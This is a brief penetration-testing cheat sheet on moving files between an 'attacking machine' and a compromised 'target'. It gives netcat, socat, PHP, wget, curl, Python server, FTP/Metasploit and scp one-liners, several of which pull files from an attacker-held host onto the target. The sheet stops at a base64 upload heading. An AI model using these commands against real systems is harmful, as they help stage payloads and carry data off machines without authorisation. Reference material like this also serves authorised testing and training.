Netcat

#Netcat:
#On attacking machine:
nc -lvp 4444 < file
#On target machine:
nc 192.168.1.100 4444 > file

Socat

#Server receiving file:
server$ socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt
client$ socat -u FILE:test.txt TCP:127.0.0.1:9876

#Server sending file:
server$ socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr
client$ socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat

PHP

echo "<?php file_put_contents('nameOfFile', fopen('<http://192.168.1.100/file>', 'r')); ?>" > down2.php

Wget

wget 192.168.1.100:9999/file.txt

Wget with FTP

wget --mirror 'ftp://ftp_user:password@192.168.1.10-'

Curl

curl -O <http://192.168.1.100/file.txt> # download

Python Webserver

python2 -m SimpleHTTPServer <port>
python3 -m http.server <port>

FTP

apt-get install python-pyftpdlib
python -m pyftpdlib -p 21
#OR With Metasploit:
use/auxiliary/server/ftp
#Create a script with the following code in the attacked machine:
open 192.168.1.100
anonymous  
whatever  
binary  
get file.exe  
bye
#and use:
fpt -s:ftp_commands.txt

SCP

#SCP from ssh
# Copy a file:
scp /path/to/source/file.ext username@192.168.1.100:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.100:/path/to/destination

File Upload via b64Encoding